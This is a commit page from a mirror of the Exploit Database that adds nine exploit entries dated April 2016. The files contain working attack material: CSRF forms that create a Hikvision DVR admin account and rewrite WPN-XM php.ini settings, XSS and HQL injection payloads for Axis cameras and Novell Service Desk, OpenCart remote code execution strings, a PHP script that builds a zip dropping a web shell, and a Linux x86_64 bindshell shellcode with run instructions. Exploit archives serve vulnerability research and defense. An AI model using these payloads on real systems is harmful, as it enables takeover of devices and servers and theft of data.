bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-12

Browse source 
9 new exploits

Hikvision Digital Video Recorder - Cross-Site Request Forgery
WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery
OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution
CAM UnZip 5.1 - Archive Path Traversal
Axis Network Cameras - Multiple Vulnerabilities
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-04-12 05:04:12 +00:00
parent 939a1a9e78
commit 921bb6b2e3
10 changed files with 860 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -35898,3 +35898,12 @@ id,file,description,date,author,platform,type,port
39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0
39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0

Can't render this file because it is too large.

46
platforms/android/dos/39685.txt Executable file
View file

@ -0,0 +1,46 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=711
Android: Information Disclosure in IOMX getConfig/getParameter
Platform: Verified on google/razor/flo:6.0.1/MMB29O/2459718:user/release-keys
Class: Information Disclosure
Summary:
The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an information disclosure of uninitialized heap memory. This could be used by an attacker to break ASLR in the media server process by reading out heap memory which contains useful address information.
Description:
The relevant code in frameworks/av/media/libmedia/IOMX.cpp is:
node_id node = (node_id)data.readInt32();
OMX_INDEXTYPE index = static_cast<OMX_INDEXTYPE>(data.readInt32());
size_t size = data.readInt64();
void *params = malloc(size);
data.read(params, size); <- Read in the buffer from the parcel to initialize
// SNIP - getParameter etc.
if ((code == GET_PARAMETER || code == GET_CONFIG) && err == OK) {
reply->write(params, size); <- Write back entire buffer to caller
}
The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesnt have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesnt write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized.
Arguably theres also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case.
Id suggest that the result of data.read should be checked to ensure all the data has been read correctly.
Proof of Concept:
Ive provided a PoC which exploits the issue and prints a 64 byte buffer (with 56 bytes uninitialized) to logcat. It uses the OMX.qcom.video.decoder.mpeg4 component. Ive only tested this on a Nexus 5 and Nexus 7 devices, but Im guessing that decoder should be everywhere. You should be able to create default Android Studio project and call OMXInfoDisclosurePoC.testOMX
from the Main Activity. When run you should see a line in logcat similar to:
E/MyClass: allocateNode Error: 0
E/MyClass: Allocate Node: 42
E/MyClass: Result: 040000000101000XXXXXXXXXX
Where XXXXXX should be uninitialized memory from the heap.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip

90
platforms/android/dos/39686.txt Executable file
View file

@ -0,0 +1,90 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=706
Android: IMemory Native Interface is insecure for IPC use
Platform: Tested on Android 6.0.1 January patches
Class: Elevation of Privilege
Summary:
The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services can be tricked to return arbitrary memory locations leading to information disclosure or memory corruption.
Description:
The IMemory interface allows the passing of shared memory across the Binder IPC channel on Android. The interface supports a single remote call, GET_MEMORY which requests a separate IMemoryHeap interface along with an offset value and size for the shared memory buffer. The IMemoryHeap interface in turn supports a HEAP_ID call which marshals across a FileDescriptor, size, flags and an offset. This is passed to mmap to map the shared memory into the current process.
The underlying vulnerability is the sizes in IMemory and IMemoryHeap are not checked relative to one another, and nor is the offset in IMemory checked against the size of IMemoryHeap. This allows a local process to craft fake IMemory and IMemoryHeap objects such that they lie about their values and either cause information disclosure or memory corruption.
To understand this lets look at how the pointer to the shared buffer is extracted from IMemory::pointer:
void* IMemory::pointer() const {
ssize_t offset;
sp<IMemoryHeap> heap = getMemory(&offset);
void* const base = heap!=0 ? heap->base() : MAP_FAILED;
if (base == MAP_FAILED)
return 0;
return static_cast<char*>(base) + offset; <- No check on IMemoryHeap size
}
Maybe we check sizes in getMemory() ?
sp<IMemoryHeap> BpMemory::getMemory(ssize_t* offset, size_t* size) const
{
if (mHeap == 0) {
Parcel data, reply;
data.writeInterfaceToken(IMemory::getInterfaceDescriptor());
if (remote()->transact(GET_MEMORY, data, &reply) == NO_ERROR) {
sp<IBinder> heap = reply.readStrongBinder();
ssize_t o = reply.readInt32();
size_t s = reply.readInt32(); <- No check.
if (heap != 0) {
mHeap = interface_cast<IMemoryHeap>(heap);
if (mHeap != 0) {
mOffset = o;
mSize = s;
}
}
}
}
if (offset) *offset = mOffset;
if (size) *size = mSize;
return mHeap;
}
Nope, as we can see, no check is made of IMemoryHeaps size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer().
So how can this be abused? Any IPC service which calls pointer() can be tricked into accessing an arbitrary location, either a relative offset to the file mapped or NULL. For example look at ICrypto::onTransact with the DECRYPT operation. It checks that the offset is within the total size (this has been exploited before) with:
} else if (totalSize > sharedBuffer->size()) {
result = -EINVAL;
} else if ((size_t)offset > sharedBuffer->size() - totalSize) {
result = -EINVAL;
The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as theres no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF.
This can be turned into an arbitrary write as long as you can pass an arbitrary IMemory to another service. For example the BnCameraRecordingProxy::onTransact in frameworks/av/camera/ICameraRecordingProxy.cpp does the following for onReleaseRecordingFrame
case RELEASE_RECORDING_FRAME: {
ALOGV("RELEASE_RECORDING_FRAME");
CHECK_INTERFACE(ICameraRecordingProxy, data, reply);
sp<IMemory> mem = interface_cast<IMemory>(data.readStrongBinder());
if (CameraUtils::isNativeHandleMetadata(mem)) {
VideoNativeHandleMetadata *metadata =
(VideoNativeHandleMetadata*)(mem->pointer());
metadata->pHandle = data.readNativeHandle();
// releaseRecordingFrame will be responsble to close the native handle.
}
releaseRecordingFrame(mem);
return NO_ERROR;
} break;
As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled.
Proof of Concept:
Ive provided a PoC which exploits the issue in ICrypto::decrypt. I will just SIG_SEGV on reading an arbitrary location (in this case 1GiB relative to the mapped memory). If it succeeds then thats good as well as it shouldn't succeed. You should be able to create default Android Studio project and replace the MainActivity with the provided Java file. When run it should cause media server to crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip

53
platforms/hardware/webapps/39677.html Executable file
View file

@ -0,0 +1,53 @@
<!--
Hikvision Digital Video Recorder Cross-Site Request Forgery
Vendor: Hikvision Digital Technology Co., Ltd
Product web page: http://www.hikvision.com
Affected version: LV-D2104CS
DS-7316HFI-ST
DS-7216HVI-SV/A
DS-7208HVI-SH
DS-7204HVI-SH
Summary: Hikvision is the global leader of video surveillance
products and solutions, manufactures a wide range of top-quality,
reliable, and professional solutions.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Hikvision-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5315
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php
Vendor: http://overseas.hikvision.com/europe/list01_435.html
13.01.2016
--
CSRF Add Operator:
------------------
-->
<html>
<body>
<form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;><User><id>3<&#47;id><userName>tes2t<&#47;userName><password>test2<&#47;password><Extensions><bondIp><ipAddress>0&#46;0&#46;0&#46;0<&#47;ipAddress><&#47;bondIp><attribute><inherent>true<&#47;inherent><&#47;attribute><&#47;Extensions><&#47;User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

138
platforms/hardware/webapps/39683.txt Executable file
View file

@ -0,0 +1,138 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| 6079 Smith W
| (_) | | \ V V / __/ | | | (_| | |_) \__ \ doubleplusungood
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ owning some telescreens...
Security Adivisory
2016-04-09
www.orwelllabs.com
twt:@orwelllabs
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the worlds first
network camera back in 1996 and weve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. solution
-------------
It was not provided any solution to the problem.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.

172
platforms/jsp/webapps/39687.txt Executable file
View file

@ -0,0 +1,172 @@
>> Multiple vulnerabilities in Novell Service Desk 7.1.0, 7.0.3 and 6.5
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 30/03/2016 / Last updated: 10/04/2016
>> Background on the affected products:
"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
>> Summary:
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk".
Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
>> Technical details:
#1
Vulnerability: Arbitrary file upload via directory traversal (leading to remote code execution)
CVE-2016-1593
Constraints: Administrator account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
The User -> Customers -> Import function allows an administrator to upload files. The path specified in the filename parameter can be traversed using ../ characters and upload a JSP file to the Tomcat directory.
The default path to be traversed is /LiveTime/Uploads/ on the Novell Service Desk Virtual Appliance Demo.
POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7.0.3.0.0.1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------2477470717121
Content-Length: 533
-----------------------------2477470717121
Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
Content-Type: application/octet-stream
<HTML>
<HEAD>
<TITLE>Hello World</TITLE>
</HEAD>
<BODY>
<H1>Hello World</H1>
Today is: <%= new java.util.Date().toString() %>
</BODY>
</HTML>
-----------------------------2477470717121
Content-Disposition: form-data; name="ButtonUpload"
Upload
-----------------------------2477470717121--
#2
Vulnerability: Information disclosure (Download System logs as any authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles
Contains the full error log, license and system information (operating system, java version, database, etc).
#3
Vulnerability: Information disclosure (Download any attachment from any client as an authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=ItemTypeAttach
Possible entityNames are:
KbaAttachment
ServiceAttachment
IncidentAttachment
ItemAttach
ProjectAttachment
GroupAttachment
ContractAttachment
ItemTypeAttach
Cycling through all attachmentId numbers will yield all attachments for each entityName.
#4
Vulnerability: Hibernate Query Language (HQL) injection
CVE-2016-1595
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
Input is passed directly to Hibernate (line 125 of DownloadAction.class):
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
hasEn is entityName (string) and hasId is attachmentId (integer)
#5
Vulnerability: Stored Cross Site Scripting (XSS)
CVE-2016-1596
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
Several sections of the web application are vulnerable to stored cross site scripting. This includes the administrator portal (when logged in as an administrator, technician, manager or other administrative user), the end user portal (when logged in as a normal end user) and the forums. The vulnerabilities below are just examples as the vulnerability is present in many different pages.
a)
In the customer portal, clicking the user name will allow you to edit your display name.
The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
Example:
tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
b)
In the Forums the content section is vulnerable when creating a new topic.
The affected parameter is ta_selectedTopicContent.
Example:
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
The alert box will pop up when you view the topic.
c)
In User -> Organizational Units, the name parameter is vulnerable (tf_orgUnitName) when you are creating a new Organizational Unit.
Example:
POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
-----------------------------3162880314525
Content-Disposition: form-data; name="tf_orgUnitName"
"><script>alert(1)</script>
The alert box will pop up when you view the Organizational Units page and possibly in other pages.
d)
In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
Example:
tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
>> Fix:
#1, #3, #4 and 5# - Upgrade to version 7.2.0
#2 - Upgrade to version 7.1.0
>> References:
[1] https://www.novell.com/support/kb/doc.php?id=7017428
[2] https://www.novell.com/support/kb/doc.php?id=7017429
[3] https://www.novell.com/support/kb/doc.php?id=7017431
[4] https://www.novell.com/support/kb/doc.php?id=7017430
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

88
platforms/lin_x86-64/shellcode/39684.c Executable file
View file

@ -0,0 +1,88 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 99 cdq
400081: 6a 29 push 0x29
400083: 58 pop rax
400084: 6a 01 push 0x1
400086: 5e pop rsi
400087: 6a 02 push 0x2
400089: 5f pop rdi
40008a: 0f 05 syscall
40008c: 48 97 xchg rdi,rax
40008e: 6a 02 push 0x2
400090: 66 c7 44 24 02 15 e0 mov WORD PTR [rsp+0x2],0xe015
400097: 54 push rsp
400098: 5e pop rsi
400099: 52 push rdx
40009a: 6a 10 push 0x10
40009c: 5a pop rdx
40009d: 6a 31 push 0x31
40009f: 58 pop rax
4000a0: 0f 05 syscall
4000a2: 50 push rax
4000a3: 5e pop rsi
4000a4: 6a 32 push 0x32
4000a6: 58 pop rax
4000a7: 0f 05 syscall
4000a9: 6a 2b push 0x2b
4000ab: 58 pop rax
4000ac: 0f 05 syscall
4000ae: 48 97 xchg rdi,rax
4000b0: 6a 03 push 0x3
4000b2: 5e pop rsi
4000b3: 48 ff ce dec rsi
4000b6: 6a 21 push 0x21
4000b8: 58 pop rax
4000b9: 0f 05 syscall
4000bb: 75 f6 jne 0x4000b3
4000bd: 99 cdq
4000be: 52 push rdx
4000bf: 48 b9 2f 62 69 6e 2f movabs rcx,0x68732f2f6e69622f
4000c6: 2f 73 68
4000c9: 51 push rcx
4000ca: 54 push rsp
4000cb: 5f pop rdi
4000cc: 6a 3b push 0x3b
4000ce: 58 pop rax
4000cf: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

113
platforms/php/webapps/39678.txt Executable file
View file

@ -0,0 +1,113 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===========
wpn-xm.org
Product:
==============================================
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional
PHP development on the Windows platform.
Vulnerability Type:
================================
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can
modify the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===============
1) Hijack MySQL Account Default Settings
<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>
<form target="ifrm" id="CSRF-MySQL-Username" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_user" />
<input type="hidden" name="value" value="hyp3rlinx" />
<script>document.getElementById('CSRF-MySQL-Username').submit()</script>
</form>
<form target="ifrm" id="CSRF-MySQL-PWD" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_password">
<input type="hidden" name="value" value="PWNED!" />
<script>document.getElementById('CSRF-MySQL-PWD').submit()</script>
</form>
2) Hijack PHP.INI Settings
<form id="CSRF-PHP-INI" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="directive" value="allow_url_include" />
<input type="hidden" name="value" value="On" />
<script>document.getElementById('CSRF-PHP-INI').submit()</script>
</form>
Disclosure Timeline:
=====================================
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx

48
platforms/php/webapps/39679.txt Executable file
View file

@ -0,0 +1,48 @@
OpenCart json_decode function Remote PHP Code Execution
Author: Naser Farhadi
Twitter: @naserfarhadi
Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
Vendor Homepage: http://www.opencart.com/
Vulnerability:
------------
/upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
$return = ($function) ? $function() : null;
...
return $return;
Exploit(json_decode):
------------
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"1"."2"."3"}'));
Real World Exploit(OpenCart /index.php?route=account/edit)
------------
go to http://host/shop_directory/index.php?route=account/edit
fill $_SERVER[HTTP_USER_AGENT] as First Name
/** save it two times **/
Code execution happens when an admin user visits the administration panel, in this example
admin user sees his user agent as your First Name in Recent Activity :D
Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
------------
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
user information like extra phone number,... you can directly execute your injected code.
go to http://host/shop_directory/index.php?route=account/edit
fill {$_GET[b]($_GET[c])} as Custom Field value
save it
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
Note:
------------
Exploit only works if PHP JSON extension is not installed.
Video: https://youtu.be/1Ai09IQK4C0

103
platforms/windows/local/39680.txt Executable file
View file

@ -0,0 +1,103 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt
Vendor:
=================
www.camunzip.com
Product:
==============
CAM UnZip v5.1
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CAM UnZip fails to check that the paths of the files in the archive do not
engage in path traversal when uncompressing the archive files.
specially crafted files in the archive containing '..\' in file name can
overwrite files on the filesystem by backtracking or allow attackers
to place malicious files on system outside of the target unzip directory
which may lead to remote command execution exploits etc...
Tested successfully Windows 7
Exploit code(s):
===============
malicious archive script...
<?php
#CAM UnZip v5.1
#directory traversal to remote code execution exploit
#====================================================
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
exec($_GET["cmd"]); ?>');
$zip->close();
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
/////////////////////////////////////////////////////////////////////////////////////
Result:
Creating Folder: C:\Test\BOZO
Extracting Files From: C:\Test\BOZO.zip
Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
1 file was Extracted.
C:\RCE.php
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx